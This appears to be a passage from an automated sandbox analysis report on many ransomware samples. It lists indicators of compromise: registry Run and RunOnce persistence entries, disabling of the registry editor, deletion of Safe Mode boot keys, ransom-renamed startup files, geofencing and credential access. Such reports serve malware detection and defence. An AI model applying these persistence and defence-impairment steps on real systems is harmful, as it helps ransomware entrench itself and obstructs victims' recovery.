"zryqncncriuikukh.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe" ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" lurwhzlcveb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" ajhqekm.exe -
Disables RegEdit via registry modification 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" lurwhzlcveb.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ajhqekm.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5864 attrib.exe -
resource yara_rule behavioral1/files/0x0008000000023bd8-125.dat aspack_v212_v242 behavioral1/files/0x0009000000023c8a-203.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation lurwhzlcveb.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation tpvpyme.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 38 IoCs
description ioc Process File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].bot taskmgr.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].bot.id-7e980581.[[email protected]].money taskmgr.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7e980581.[[email protected]].bot.id-7e980581.[[email protected]].money taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7e980581.[[email protected]].bot taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\info.hta taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\soft.lnk.id-7e980581.[[email protected]].money taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\trojan-ransom.win32.crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe.id-7e980581.[[email protected]].money taskmgr.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\info.hta taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe -
Executes dropped EXE 36 IoCs
pid Process 468 HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe 4904 HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 1408 HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe 672 HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe 4928 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe 3936 HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 5020 Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe 1776 tpvpyme.exe 3404 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 2004 Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe 1652 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 4324 lurwhzlcveb.exe 3188 Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe 4956 Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe 3172 Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe 4600 Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe 4412 Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe 2188 Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe 3472 Sunwin.exe 5072 Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe 4328 ajhqekm.exe 4128 ajhqekm.exe 4536 Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe 2304 Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe 2864 Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe 1396 Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 2768 VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe 5540 Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe 5804 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 9960 Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe 9200 Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe 8824 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe 5868 lurwhzlcveb.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\WINE Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\WINE Sunwin.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys ajhqekm.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc ajhqekm.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power ajhqekm.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys ajhqekm.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc ajhqekm.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager ajhqekm.exe -
Loads dropped DLL 1 IoCs
pid Process 8824 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5856 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "pjsmlcpgxqeuykcbus.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "gzhayoaqgyladofdv.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "avfaasgyqkzqvibbvue.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "czlikeuoievovkfhdeqnz.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "njuqrkzslgwouicdyyjf.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "njuqrkzslgwouicdyyjf.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7c663e5a-c668-44b3-88ed-139e79eff5db\\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe\" --AutoStart" 